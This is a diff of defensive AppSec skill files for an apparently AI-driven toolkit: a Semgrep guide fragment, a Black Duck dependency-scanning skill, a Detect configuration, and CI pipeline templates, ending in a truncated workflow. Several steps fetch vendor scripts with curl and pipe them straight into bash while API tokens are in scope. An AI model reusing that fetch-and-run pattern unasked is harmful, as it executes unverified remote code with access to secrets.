# Test custom rules
semgrep --config rules.yaml --test tests/
# Validate rule syntax
semgrep --validate --config rules.yaml
```
## Rule Performance Optimization
### 1. Use Specific Patterns
```yaml
# SLOW
pattern: $X
# FAST
pattern: dangerous_function($X)
```
### 2. Limit Language Scope
```yaml
# Only scan relevant languages
languages: [python, javascript]
```
### 3. Use Pattern-Inside Wisely
```yaml
# Narrow down context early
patterns:
- pattern-inside: |
def handle_request(...):
...
- pattern: execute($QUERY)
```
### 4. Exclude Test Files
```yaml
paths:
exclude:
- "*/test_*.py"
- "*/tests/*"
- "*_test.go"
```
## Community Rules
Explore community-contributed rules:
```bash
# Browse rules by technology
semgrep --config "r/python.django"
semgrep --config "r/javascript.react"
semgrep --config "r/go.gorilla"
# Browse by vulnerability type
semgrep --config "r/generic.secrets"
semgrep --config "r/generic.html-templates"
```
**Useful Community Rulesets:**
- `r/python.aws-lambda.security` - AWS Lambda security
- `r/terraform.aws.security` - AWS Terraform
- `r/dockerfile.best-practice` - Docker best practices
- `r/yaml.github-actions.security` - GitHub Actions security
## References
- [Semgrep Rule Syntax](https://semgrep.dev/docs/writing-rules/rule-syntax/)
- [Semgrep Registry](https://semgrep.dev/explore)
- [Pattern Examples](https://semgrep.dev/docs/writing-rules/pattern-examples/)
- [Rule Writing Tutorial](https://semgrep.dev/learn)

View File

@@ -0,0 +1,391 @@
---
name: sca-blackduck
description: >
Software Composition Analysis (SCA) using Synopsys Black Duck for identifying open source
vulnerabilities, license compliance risks, and supply chain security threats with CVE,
CWE, and OWASP framework mapping. Use when: (1) Scanning dependencies for known
vulnerabilities and security risks, (2) Analyzing open source license compliance and
legal risks, (3) Identifying outdated or unmaintained dependencies, (4) Integrating
SCA into CI/CD pipelines for continuous dependency monitoring, (5) Providing remediation
guidance for vulnerable dependencies with CVE and CWE mappings, (6) Assessing supply
chain security risks and third-party component threats.
version: 0.1.0
maintainer: SirAppSec
category: appsec
tags: [sca, blackduck, dependency-scanning, vulnerability-management, license-compliance, supply-chain, cve, owasp]
frameworks: [OWASP, CWE, NIST, SOC2, PCI-DSS]
dependencies:
tools: [docker, git, detect]
access: [blackduck-url, api-token]
references:
- https://sig-product-docs.synopsys.com/bundle/bd-hub/page/Welcome.html
- https://owasp.org/www-project-dependency-check/
- https://nvd.nist.gov/
- https://www.cisa.gov/sbom
---
# Software Composition Analysis with Black Duck
## Overview
Perform comprehensive Software Composition Analysis (SCA) using Synopsys Black Duck to identify
security vulnerabilities, license compliance risks, and supply chain threats in open source
dependencies. This skill provides automated dependency scanning, vulnerability detection with
CVE mapping, license risk analysis, and remediation guidance aligned with OWASP and NIST standards.
## Quick Start
Scan a project for dependency vulnerabilities:
```bash
# Using Black Duck Detect (recommended)
bash <(curl -s -L https://detect.synopsys.com/detect.sh) \
--blackduck.url=$BLACKDUCK_URL \
--blackduck.api.token=$BLACKDUCK_TOKEN \
--detect.project.name="MyProject" \
--detect.project.version.name="1.0.0"
```
Scan with policy violation enforcement:
```bash
# Fail build on policy violations
bash <(curl -s -L https://detect.synopsys.com/detect.sh) \
--blackduck.url=$BLACKDUCK_URL \
--blackduck.api.token=$BLACKDUCK_TOKEN \
--detect.policy.check.fail.on.severities=BLOCKER,CRITICAL
```
## Core Workflows
### Workflow 1: Initial Dependency Security Assessment
Progress:
[ ] 1. Identify package managers and dependency manifests in codebase
[ ] 2. Run `scripts/blackduck_scan.py` with project detection
[ ] 3. Analyze vulnerability findings categorized by severity (CRITICAL, HIGH, MEDIUM, LOW)
[ ] 4. Map CVE findings to CWE and OWASP Top 10 categories
[ ] 5. Review license compliance risks and policy violations
[ ] 6. Generate prioritized remediation report with upgrade recommendations
Work through each step systematically. Check off completed items.
### Workflow 2: Vulnerability Remediation
1. Review scan results and identify critical/high severity vulnerabilities
2. For each vulnerability:
- Check if fixed version is available
- Review breaking changes in upgrade path
- Consult `references/remediation_strategies.md` for vulnerability-specific guidance
3. Apply dependency updates using your package manager (see the sketch after this list)
4. Re-scan to validate fixes
5. Document any vulnerabilities accepted as risk with justification
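A minimal sketch of steps 3-4 for an npm project (package name, version, and project coordinates are illustrative):

```bash
# Upgrade the vulnerable dependency to the fixed version
npm install lodash@4.17.21

# Re-scan the dependency detectors to validate the fix
bash <(curl -s -L https://detect.synopsys.com/detect.sh) \
  --blackduck.url=$BLACKDUCK_URL \
  --blackduck.api.token=$BLACKDUCK_TOKEN \
  --detect.project.name="MyProject" \
  --detect.project.version.name="1.0.0" \
  --detect.tools=DETECTOR \
  --detect.policy.check.fail.on.severities=CRITICAL,HIGH
```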
### Workflow 3: License Compliance Analysis
1. Run Black Duck scan with license risk detection enabled
2. Review components flagged with license compliance issues
3. Categorize by risk level:
- **High Risk**: GPL, AGPL (copyleft licenses)
- **Medium Risk**: LGPL, MPL (weak copyleft)
- **Low Risk**: Apache, MIT, BSD (permissive)
4. Consult legal team for high-risk license violations
5. Document license decisions and create policy exceptions if approved
### Workflow 4: CI/CD Integration
1. Add Black Duck Detect to CI/CD pipeline using `assets/ci_integration/`
2. Configure environment variables for Black Duck URL and API token
3. Set policy thresholds (fail on CRITICAL/HIGH vulnerabilities)
4. Enable SBOM generation for supply chain transparency
5. Configure alerts for new vulnerabilities in production dependencies
### Workflow 5: Supply Chain Risk Assessment
1. Identify direct and transitive dependencies
2. Analyze component quality metrics (see the sketch after this list):
- Maintenance activity (last update, commit frequency)
- Community health (contributors, issue resolution)
- Security track record (historical CVEs)
3. Flag high-risk components (unmaintained, few maintainers, security issues)
4. Review alternative components with better security posture
5. Document supply chain risks and mitigation strategies
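A minimal sketch of the maintenance-activity check from step 2, assuming npm packages and the public registry API at `https://registry.npmjs.org/<package>`; the staleness threshold is illustrative:

```python
import datetime
import json
import urllib.request

STALE_AFTER_DAYS = 365  # illustrative threshold for "possibly unmaintained"

def last_publish_age_days(package_name):
    """Return days since the package was last published to the npm registry."""
    with urllib.request.urlopen(f"https://registry.npmjs.org/{package_name}") as resp:
        metadata = json.load(resp)
    modified = metadata["time"]["modified"]  # ISO 8601 timestamp
    last = datetime.datetime.fromisoformat(modified.replace("Z", "+00:00"))
    return (datetime.datetime.now(datetime.timezone.utc) - last).days

for pkg in ["lodash", "left-pad"]:
    age = last_publish_age_days(pkg)
    flag = "REVIEW" if age > STALE_AFTER_DAYS else "ok"
    print(f"{pkg}: last published {age} days ago [{flag}]")
```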
## Security Considerations
- **Sensitive Data Handling**: Black Duck scans require API tokens with read/write access.
Store credentials securely in secrets management (Vault, AWS Secrets Manager).
  Never commit tokens to version control (see the example after this section).
- **Access Control**: Limit Black Duck access to authorized security and development teams.
Use role-based access control (RBAC) for scan result visibility and policy management.
- **Audit Logging**: Log all scan executions with timestamps, user, project version, and
findings count for compliance auditing. Enable Black Duck's built-in audit trail.
- **Compliance**: SCA scanning supports SOC2, PCI-DSS, GDPR, and HIPAA compliance by
tracking third-party component risks. Generate SBOM for regulatory requirements.
- **Safe Defaults**: Configure policies to fail builds on CRITICAL and HIGH severity
vulnerabilities. Use allowlists sparingly with documented business justification.
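For example, the API token can be pulled from AWS Secrets Manager at scan time instead of living in the repository or CI configuration (the secret name is illustrative):

```bash
export BLACKDUCK_TOKEN=$(aws secretsmanager get-secret-value \
  --secret-id blackduck/api-token \
  --query SecretString \
  --output text)
```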
## Supported Package Managers
Black Duck Detect automatically identifies and scans:
- **JavaScript/Node**: npm, yarn, pnpm
- **Python**: pip, pipenv, poetry
- **Java**: Maven, Gradle
- **Ruby**: Bundler, gem
- **.NET**: NuGet
- **Go**: go modules
- **PHP**: Composer
- **Rust**: Cargo
- **C/C++**: Conan, vcpkg
- **Docker**: Container image layers
## Bundled Resources
### Scripts
- `scripts/blackduck_scan.py` - Full-featured scanning with CVE/CWE mapping and reporting
- `scripts/analyze_results.py` - Parse Black Duck results and generate remediation report
- `scripts/sbom_generator.sh` - Generate SBOM (CycloneDX/SPDX) from scan results
- `scripts/policy_checker.py` - Validate compliance with organizational security policies
### References
- `references/cve_cwe_owasp_mapping.md` - CVE to CWE and OWASP Top 10 mapping
- `references/remediation_strategies.md` - Vulnerability remediation patterns and upgrade strategies
- `references/license_risk_guide.md` - License compliance risk assessment and legal guidance
- `references/supply_chain_threats.md` - Common supply chain attack patterns and mitigations
### Assets
- `assets/ci_integration/github_actions.yml` - GitHub Actions workflow for Black Duck scanning
- `assets/ci_integration/gitlab_ci.yml` - GitLab CI configuration for SCA
- `assets/ci_integration/jenkins_pipeline.groovy` - Jenkins pipeline with Black Duck integration
- `assets/policy_templates/` - Pre-configured security and compliance policies
- `assets/blackduck_config.yml` - Recommended Black Duck Detect configuration
## Common Patterns
### Pattern 1: Daily Dependency Security Baseline
```bash
# Run comprehensive scan and generate SBOM
scripts/blackduck_scan.py \
--project "MyApp" \
--version "1.0.0" \
--output results.json \
--generate-sbom \
--severity CRITICAL HIGH
```
### Pattern 2: Pull Request Dependency Gate
```bash
# Scan PR changes, fail on new high-severity vulnerabilities
bash <(curl -s -L https://detect.synopsys.com/detect.sh) \
--blackduck.url=$BLACKDUCK_URL \
--blackduck.api.token=$BLACKDUCK_TOKEN \
--detect.policy.check.fail.on.severities=CRITICAL,HIGH \
--detect.wait.for.results=true
```
### Pattern 3: License Compliance Audit
```bash
# Generate license compliance report
scripts/blackduck_scan.py \
--project "MyApp" \
--version "1.0.0" \
--report-type license \
--output license-report.pdf
```
### Pattern 4: Vulnerability Research and Triage
```bash
# Extract CVE details and remediation guidance
scripts/analyze_results.py \
--input scan-results.json \
--filter-severity CRITICAL HIGH \
--include-remediation \
--output vulnerability-report.md
```
### Pattern 5: SBOM Generation for Compliance
```bash
# Generate Software Bill of Materials (CycloneDX format)
scripts/sbom_generator.sh \
--project "MyApp" \
--version "1.0.0" \
--format cyclonedx \
--output sbom.json
```
## Integration Points
### CI/CD Integration
- **GitHub Actions**: Use `synopsys-sig/detect-action@v1` with policy enforcement
- **GitLab CI**: Run as security scanning job with dependency scanning template
- **Jenkins**: Execute Detect as pipeline step with quality gates
- **Azure DevOps**: Integrate using Black Duck extension from marketplace
See `assets/ci_integration/` for ready-to-use pipeline configurations.
### Security Tool Integration
- **SIEM/SOAR**: Export findings in JSON/CSV for ingestion into Splunk, ELK
- **Vulnerability Management**: Integrate with Jira, ServiceNow, DefectDojo
- **Secret Scanning**: Combine with Gitleaks, TruffleHog for comprehensive security
- **SAST Tools**: Use alongside Semgrep, Bandit for defense-in-depth
### SDLC Integration
- **Requirements Phase**: Define acceptable license and vulnerability policies
- **Development**: IDE plugins provide real-time dependency security feedback
- **Code Review**: Automated dependency review in PR workflow
- **Testing**: Validate security of third-party components
- **Deployment**: Final dependency gate before production release
- **Operations**: Continuous monitoring for new vulnerabilities in production
## Severity Classification
Black Duck classifies vulnerabilities by CVSS score and severity:
- **CRITICAL** (CVSS 9.0-10.0): Remotely exploitable with severe impact (RCE, SQLi)
- **HIGH** (CVSS 7.0-8.9): Significant security risks requiring immediate attention
- **MEDIUM** (CVSS 4.0-6.9): Moderate security weaknesses needing remediation
- **LOW** (CVSS 0.1-3.9): Minor security issues or defense-in-depth improvements
- **NONE** (CVSS 0.0): Informational findings
## Policy Management
### Creating Security Policies
1. Define organizational risk thresholds (e.g., fail on CVSS >= 7.0)
2. Configure license compliance rules using `assets/policy_templates/`
3. Set component usage policies (blocklists for known malicious packages)
4. Enable operational risk policies (unmaintained dependencies, age thresholds)
5. Document policy exceptions with business justification and expiration dates
### Policy Enforcement
```bash
# Enforce custom policy during scan
bash <(curl -s -L https://detect.synopsys.com/detect.sh) \
--blackduck.url=$BLACKDUCK_URL \
--blackduck.api.token=$BLACKDUCK_TOKEN \
--detect.policy.check.fail.on.severities=BLOCKER,CRITICAL \
--detect.wait.for.results=true
```
## Performance Optimization
For large projects with many dependencies:
```bash
# Use intelligent scan mode (incremental)
bash <(curl -s -L https://detect.synopsys.com/detect.sh) \
--detect.detector.search.depth=3 \
--detect.blackduck.signature.scanner.snippet.matching=SNIPPET_MATCHING \
--detect.parallel.processors=4
# Exclude test and development dependencies
bash <(curl -s -L https://detect.synopsys.com/detect.sh) \
--detect.excluded.detector.types=PIP,NPM_PACKAGE_LOCK \
--detect.npm.include.dev.dependencies=false
```
## Troubleshooting
### Issue: Too Many False Positives
**Solution**:
- Review vulnerability applicability (is vulnerable code path used?)
- Use vulnerability suppression with documented justification
- Configure component matching precision in Black Duck settings
- Verify component identification accuracy (check for misidentified packages)
### Issue: License Compliance Violations
**Solution**:
- Review component licenses in Black Duck dashboard
- Consult `references/license_risk_guide.md` for risk assessment
- Replace high-risk licensed components with permissive alternatives
- Obtain legal approval and document policy exceptions
### Issue: Scan Not Detecting Dependencies
**Solution**:
- Verify package manager files are present (package.json, requirements.txt, pom.xml)
- Check Black Duck Detect logs for detector failures
- Ensure dependencies are installed before scanning (run npm install, pip install)
- Use `--detect.detector.search.depth` to increase search depth (example below)
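For example (increasing search depth and enabling debug logging; property names follow `assets/blackduck_config.yml`):

```bash
bash <(curl -s -L https://detect.synopsys.com/detect.sh) \
  --blackduck.url=$BLACKDUCK_URL \
  --blackduck.api.token=$BLACKDUCK_TOKEN \
  --detect.detector.search.depth=5 \
  --logging.level.com.synopsys.integration=DEBUG
```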
### Issue: Slow Scan Performance
**Solution**:
- Use snippet matching instead of full file matching
- Increase `--detect.parallel.processors` for multi-core systems
- Exclude test directories and development dependencies
- Use intelligent/rapid scan mode for faster feedback
## Advanced Usage
### Vulnerability Analysis
For detailed vulnerability research, consult `references/remediation_strategies.md`.
Key remediation strategies:
1. **Upgrade**: Update to fixed version (preferred)
2. **Patch**: Apply security patch if upgrade not feasible
3. **Replace**: Switch to alternative component without vulnerability
4. **Mitigate**: Implement workarounds or compensating controls
5. **Accept**: Document risk acceptance with business justification
### Supply Chain Security
See `references/supply_chain_threats.md` for comprehensive coverage of:
- Dependency confusion attacks
- Typosquatting and malicious packages
- Compromised maintainer accounts
- Backdoored dependencies
- Unmaintained and abandoned projects
### SBOM Generation and Management
Black Duck supports standard SBOM formats:
- **CycloneDX**: Modern, machine-readable format for vulnerability management (minimal example below)
- **SPDX**: ISO/IEC standard for software package data exchange
Use SBOMs for:
- Supply chain transparency
- Regulatory compliance (Executive Order 14028)
- Incident response (rapid vulnerability identification)
- M&A due diligence
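For orientation, a trimmed-down CycloneDX document has this shape (real SBOMs generated from a scan carry many more components and fields):

```json
{
  "bomFormat": "CycloneDX",
  "specVersion": "1.5",
  "version": 1,
  "components": [
    {
      "type": "library",
      "name": "lodash",
      "version": "4.17.21",
      "purl": "pkg:npm/lodash@4.17.21"
    }
  ]
}
```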
## Best Practices
1. **Shift Left**: Integrate SCA early in development lifecycle
2. **Policy-Driven**: Define clear policies for vulnerabilities and licenses
3. **Continuous Monitoring**: Run scans on every commit and nightly for production
4. **Remediation Prioritization**: Focus on exploitable vulnerabilities first
5. **SBOM Management**: Maintain up-to-date SBOM for all production applications
6. **Supply Chain Hygiene**: Regularly review dependency health and maintainability
7. **License Compliance**: Establish license approval process before adoption
8. **Defense in Depth**: Combine SCA with SAST, DAST, and security testing
## References
- [Black Duck Documentation](https://sig-product-docs.synopsys.com/bundle/bd-hub/page/Welcome.html)
- [Black Duck Detect](https://sig-product-docs.synopsys.com/bundle/integrations-detect/page/introduction.html)
- [OWASP Dependency-Check](https://owasp.org/www-project-dependency-check/)
- [National Vulnerability Database](https://nvd.nist.gov/)
- [SBOM Standards (CISA)](https://www.cisa.gov/sbom)
- [CycloneDX SBOM Standard](https://cyclonedx.org/)
- [SPDX License List](https://spdx.org/licenses/)

View File

@@ -0,0 +1,9 @@
# Assets Directory
Place files that will be used in the output Claude produces:
- Templates
- Configuration files
- Images/logos
- Boilerplate code
These files are NOT loaded into context but copied/modified in output.

View File

@@ -0,0 +1,213 @@
# Black Duck Detect Configuration
# Place this file in the root of your project or reference it with:
# --detect.yaml.configuration.path=/path/to/blackduck_config.yml
# Black Duck Server Configuration
blackduck:
url: ${BLACKDUCK_URL} # Set via environment variable
api:
token: ${BLACKDUCK_TOKEN} # Set via environment variable
timeout: 300
trust.cert: false
# Project Configuration
detect:
project:
name: ${PROJECT_NAME:MyProject}
version:
name: ${PROJECT_VERSION:1.0.0}
description: "Software Composition Analysis with Black Duck"
tier: 3 # Project tier (1-5, 1=highest priority)
# Detection Configuration
detector:
search:
depth: 3 # How deep to search for build files
continue: true # Continue if a detector fails
exclusion:
paths: |
node_modules/**/.bin,
vendor/**,
**/__pycache__,
**/site-packages,
**/.venv,
**/venv,
test/**,
tests/**,
**/*.test.js,
**/*.spec.js
buildless: false # Use buildless mode (faster but less accurate)
# Specific Detectors
npm:
include:
dev:
dependencies: false # Exclude dev dependencies from production scans
dependency:
types:
excluded: []
python:
python3: true
path: python3
maven:
included:
scopes: compile,runtime # Exclude test scope
excluded:
scopes: test,provided
# Signature Scanner Configuration
blackduck:
signature:
scanner:
memory: 4096 # Memory in MB for signature scanner
dry:
run: false
snippet:
matching: SNIPPET_MATCHING # or FULL_SNIPPET_MATCHING for comprehensive
upload:
source:
mode: true # Upload source for snippet matching
paths: "."
exclusion:
patterns: |
node_modules,
.git,
.svn,
vendor,
__pycache__,
*.pyc,
*.min.js,
*.bundle.js
# Binary Scanner (optional, for compiled binaries)
binary:
scan:
file:
name: ""
path: ""
# Policy Configuration
policy:
check:
fail:
on:
severities: BLOCKER,CRITICAL,MAJOR # Fail on these severity levels
enabled: true
# Wait for scan results
wait:
for:
results: true # Wait for scan to complete
# Report Configuration
risk:
report:
pdf: true
pdf:
path: "./reports"
notices:
report: true
report:
path: "./reports"
# SBOM Generation
bom:
aggregate:
name: "sbom.json" # CycloneDX SBOM output
enabled: true
# Output Configuration
output:
path: "./blackduck-output"
cleanup: true # Clean up temporary files after scan
# Performance Tuning
parallel:
processors: 4 # Number of parallel processors
# Timeout Configuration
timeout: 7200 # Overall timeout in seconds (2 hours)
# Proxy Configuration (if needed)
# proxy:
# host: proxy.company.com
# port: 8080
# username: ${PROXY_USER}
# password: ${PROXY_PASS}
# Advanced Options
tools:
excluded: [] # Can exclude DETECTOR, SIGNATURE_SCAN, BINARY_SCAN, POLARIS
force:
success: false # Force success even if issues detected (not recommended)
# Logging Configuration
logging:
level:
com:
synopsys:
integration: INFO # DEBUG for troubleshooting
detect: INFO
# Environment-Specific Configurations
---
# Development Environment
spring:
profiles: development
detect:
policy:
check:
fail:
on:
severities: BLOCKER,CRITICAL # Less strict for dev
detector:
search:
depth: 1 # Faster scans for dev
---
# Production Environment
spring:
profiles: production
detect:
policy:
check:
fail:
on:
severities: BLOCKER,CRITICAL,MAJOR # Strict for production
detector:
search:
depth: 5 # Comprehensive scans
blackduck:
signature:
scanner:
snippet:
matching: FULL_SNIPPET_MATCHING # Most thorough
risk:
report:
pdf: true # Always generate PDF for production
bom:
aggregate:
name: "production-sbom.json"
---
# CI/CD Environment
spring:
profiles: ci
detect:
wait:
for:
results: true # Wait for results in CI
policy:
check:
fail:
on:
severities: BLOCKER,CRITICAL
timeout: 3600 # 1 hour timeout for CI
parallel:
processors: 8 # Use more processors in CI

View File

@@ -0,0 +1,357 @@
# Security-Enhanced CI/CD Pipeline Template
#
# This template demonstrates security best practices for CI/CD pipelines.
# Adapt this template to your specific security tool and workflow needs.
#
# Key Security Features:
# - SAST (Static Application Security Testing)
# - Dependency vulnerability scanning
# - Secrets detection
# - Infrastructure-as-Code security scanning
# - Container image scanning
# - Security artifact uploading for compliance
name: Security Scan Pipeline
on:
push:
branches: [main, develop]
pull_request:
branches: [main, develop]
schedule:
# Run weekly security scans on Sunday at 2 AM UTC
- cron: '0 2 * * 0'
workflow_dispatch: # Allow manual trigger
# Security: Restrict permissions to minimum required
permissions:
contents: read
security-events: write # For uploading SARIF results
pull-requests: write # For commenting on PRs
env:
# Configuration
SECURITY_SCAN_FAIL_ON: 'critical,high' # Fail build on these severities
REPORT_DIR: 'security-reports'
jobs:
# Job 1: Static Application Security Testing (SAST)
sast-scan:
name: SAST Security Scan
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
with:
fetch-depth: 0 # Full history for better analysis
- name: Set up Python
uses: actions/setup-python@v5
with:
python-version: '3.11'
- name: Run SAST Scanner
run: |
# Example: Using Semgrep for SAST
          mkdir -p ${{ env.REPORT_DIR }}
          pip install semgrep
semgrep --config=auto \
--json \
--output ${{ env.REPORT_DIR }}/sast-results.json \
. || true
# Alternative: Bandit for Python projects
# pip install bandit
# bandit -r . -f json -o ${{ env.REPORT_DIR }}/bandit-results.json
- name: Process SAST Results
run: |
# Parse results and fail on critical/high severity
python3 -c "
import json
import sys
with open('${{ env.REPORT_DIR }}/sast-results.json') as f:
results = json.load(f)
critical = len([r for r in results.get('results', []) if r.get('extra', {}).get('severity') == 'ERROR'])
high = len([r for r in results.get('results', []) if r.get('extra', {}).get('severity') == 'WARNING'])
print(f'Critical findings: {critical}')
print(f'High findings: {high}')
if critical > 0:
print('❌ Build failed: Critical security issues found')
sys.exit(1)
elif high > 0:
print('⚠️ Warning: High severity issues found')
# Optionally fail on high severity
# sys.exit(1)
else:
print('✅ No critical security issues found')
"
- name: Upload SAST Results
if: always()
uses: actions/upload-artifact@v4
with:
name: sast-results
path: ${{ env.REPORT_DIR }}/sast-results.json
retention-days: 30
# Job 2: Dependency Vulnerability Scanning
dependency-scan:
name: Dependency Vulnerability Scan
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Set up Python
uses: actions/setup-python@v5
with:
python-version: '3.11'
- name: Scan Python Dependencies
if: hashFiles('requirements.txt') != ''
run: |
          mkdir -p ${{ env.REPORT_DIR }}
          pip install safety
safety check \
--json \
--output ${{ env.REPORT_DIR }}/safety-results.json \
|| true
- name: Scan Node Dependencies
if: hashFiles('package.json') != ''
run: |
          mkdir -p ${{ env.REPORT_DIR }}
          npm audit --json > ${{ env.REPORT_DIR }}/npm-audit.json || true
- name: Process Dependency Results
run: |
# Check for critical vulnerabilities
if [ -f "${{ env.REPORT_DIR }}/safety-results.json" ]; then
critical_count=$(python3 -c "import json; data=json.load(open('${{ env.REPORT_DIR }}/safety-results.json')); print(len([v for v in data.get('vulnerabilities', []) if v.get('severity', '').lower() == 'critical']))")
echo "Critical vulnerabilities: $critical_count"
if [ "$critical_count" -gt "0" ]; then
echo "❌ Build failed: Critical vulnerabilities in dependencies"
exit 1
fi
fi
- name: Upload Dependency Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: dependency-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 3: Secrets Detection
secrets-scan:
name: Secrets Detection
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
with:
fetch-depth: 0 # Full history to scan all commits
- name: Run Gitleaks
uses: gitleaks/gitleaks-action@v2
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
GITLEAKS_ENABLE_SUMMARY: true
- name: Alternative - TruffleHog Scan
if: false # Set to true to enable
run: |
pip install truffleHog
trufflehog --json --regex --entropy=True . \
> ${{ env.REPORT_DIR }}/trufflehog-results.json || true
- name: Upload Secrets Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: secrets-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 4: Container Image Scanning
container-scan:
name: Container Image Security Scan
runs-on: ubuntu-latest
if: hashFiles('Dockerfile') != ''
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Build Docker Image
run: |
docker build -t app:${{ github.sha }} .
- name: Run Trivy Scanner
uses: aquasecurity/trivy-action@master
with:
image-ref: app:${{ github.sha }}
format: 'sarif'
output: '${{ env.REPORT_DIR }}/trivy-results.sarif'
severity: 'CRITICAL,HIGH'
- name: Upload Trivy Results to GitHub Security
if: always()
uses: github/codeql-action/upload-sarif@v3
with:
sarif_file: '${{ env.REPORT_DIR }}/trivy-results.sarif'
- name: Upload Container Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: container-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 5: Infrastructure-as-Code Security Scanning
iac-scan:
name: IaC Security Scan
runs-on: ubuntu-latest
if: hashFiles('**/*.tf', '**/*.yaml', '**/*.yml') != ''
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Run Checkov
run: |
          mkdir -p ${{ env.REPORT_DIR }}
          pip install checkov
checkov -d . \
--output json \
--output-file ${{ env.REPORT_DIR }}/checkov-results.json \
--quiet \
|| true
- name: Run tfsec (for Terraform)
if: hashFiles('**/*.tf') != ''
run: |
curl -s https://raw.githubusercontent.com/aquasecurity/tfsec/master/scripts/install_linux.sh | bash
tfsec . \
--format json \
--out ${{ env.REPORT_DIR }}/tfsec-results.json \
|| true
- name: Process IaC Results
run: |
# Fail on critical findings
if [ -f "${{ env.REPORT_DIR }}/checkov-results.json" ]; then
critical_count=$(python3 -c "import json; data=json.load(open('${{ env.REPORT_DIR }}/checkov-results.json')); print(data.get('summary', {}).get('failed', 0))")
echo "Failed checks: $critical_count"
if [ "$critical_count" -gt "0" ]; then
echo "⚠️ Warning: IaC security issues found"
# Optionally fail the build
# exit 1
fi
fi
- name: Upload IaC Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: iac-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 6: Security Report Generation and Notification
security-report:
name: Generate Security Report
runs-on: ubuntu-latest
needs: [sast-scan, dependency-scan, secrets-scan]
if: always()
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Download All Scan Results
uses: actions/download-artifact@v4
with:
path: all-results/
- name: Generate Consolidated Report
run: |
# Consolidate all security scan results
mkdir -p consolidated-report
          cat > consolidated-report/security-summary.md << EOF
# Security Scan Summary
**Scan Date**: $(date -u +"%Y-%m-%d %H:%M:%S UTC")
**Commit**: ${{ github.sha }}
**Branch**: ${{ github.ref_name }}
## Scan Results
### SAST Scan
See artifacts: `sast-results`
### Dependency Scan
See artifacts: `dependency-scan-results`
### Secrets Scan
See artifacts: `secrets-scan-results`
### Container Scan
See artifacts: `container-scan-results`
### IaC Scan
See artifacts: `iac-scan-results`
---
For detailed results, download scan artifacts from this workflow run.
EOF
- name: Comment on PR (if applicable)
if: github.event_name == 'pull_request'
uses: actions/github-script@v7
with:
script: |
const fs = require('fs');
const report = fs.readFileSync('consolidated-report/security-summary.md', 'utf8');
github.rest.issues.createComment({
issue_number: context.issue.number,
owner: context.repo.owner,
repo: context.repo.repo,
body: report
});
- name: Upload Consolidated Report
if: always()
uses: actions/upload-artifact@v4
with:
name: consolidated-security-report
path: consolidated-report/
retention-days: 90
# Security Best Practices Demonstrated:
#
# 1. ✅ Minimal permissions (principle of least privilege)
# 2. ✅ Multiple security scan types (defense in depth)
# 3. ✅ Fail-fast on critical findings
# 4. ✅ Secrets detection across full git history
# 5. ✅ Container image scanning before deployment
# 6. ✅ IaC scanning for misconfigurations
# 7. ✅ Artifact retention for compliance audit trail
# 8. ✅ SARIF format for GitHub Security integration
# 9. ✅ Scheduled scans for continuous monitoring
# 10. ✅ PR comments for developer feedback
#
# Compliance Mappings:
# - SOC 2: CC6.1, CC6.6, CC7.2 (Security monitoring and logging)
# - PCI-DSS: 6.2, 6.5 (Secure development practices)
# - NIST: SA-11 (Developer Security Testing)
# - OWASP: Integrated security testing throughout SDLC

View File

@@ -0,0 +1,151 @@
name: Black Duck SCA Scan
on:
push:
branches: [ main, develop ]
pull_request:
branches: [ main, develop ]
schedule:
# Run daily at 2 AM UTC
- cron: '0 2 * * *'
workflow_dispatch:
env:
BLACKDUCK_URL: ${{ secrets.BLACKDUCK_URL }}
BLACKDUCK_TOKEN: ${{ secrets.BLACKDUCK_API_TOKEN }}
PROJECT_NAME: ${{ github.repository }}
PROJECT_VERSION: ${{ github.ref_name }}-${{ github.sha }}
jobs:
blackduck-scan:
name: Black Duck SCA Security Scan
runs-on: ubuntu-latest
permissions:
contents: read
security-events: write # For SARIF upload
pull-requests: write # For PR comments
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Setup environment
run: |
echo "::notice::Starting Black Duck scan for ${{ env.PROJECT_NAME }}"
echo "Version: ${{ env.PROJECT_VERSION }}"
- name: Run Black Duck Detect
uses: synopsys-sig/detect-action@v1
with:
github-token: ${{ secrets.GITHUB_TOKEN }}
blackduck-url: ${{ secrets.BLACKDUCK_URL }}
blackduck-api-token: ${{ secrets.BLACKDUCK_API_TOKEN }}
detect-project-name: ${{ env.PROJECT_NAME }}
detect-project-version-name: ${{ env.PROJECT_VERSION }}
# Fail on policy violations (BLOCKER/CRITICAL/MAJOR severities)
detect-policy-check-fail-on-severities: BLOCKER,CRITICAL,MAJOR
detect-wait-for-results: true
# Generate reports
detect-risk-report-pdf: true
detect-notices-report: true
# Output location
detect-output-path: ./blackduck-output
- name: Upload Black Duck Reports
if: always()
uses: actions/upload-artifact@v4
with:
name: blackduck-reports-${{ github.sha }}
path: |
./blackduck-output/**/BlackDuck_RiskReport_*.pdf
./blackduck-output/**/BlackDuck_Notices_*.txt
./blackduck-output/**/*_Black_Duck_scan.json
retention-days: 30
- name: Generate SBOM
if: success()
run: |
# Generate Software Bill of Materials
curl -s -L https://detect.synopsys.com/detect.sh | bash -s -- \
--blackduck.url=${{ secrets.BLACKDUCK_URL }} \
--blackduck.api.token=${{ secrets.BLACKDUCK_API_TOKEN }} \
--detect.project.name=${{ env.PROJECT_NAME }} \
--detect.project.version.name=${{ env.PROJECT_VERSION }} \
--detect.tools=DETECTOR \
--detect.bom.aggregate.name=sbom.json \
--detect.output.path=./sbom-output
- name: Upload SBOM
if: success()
uses: actions/upload-artifact@v4
with:
name: sbom-${{ github.sha }}
path: ./sbom-output/**/sbom.json
retention-days: 90
- name: Check for Critical Vulnerabilities
if: always()
run: |
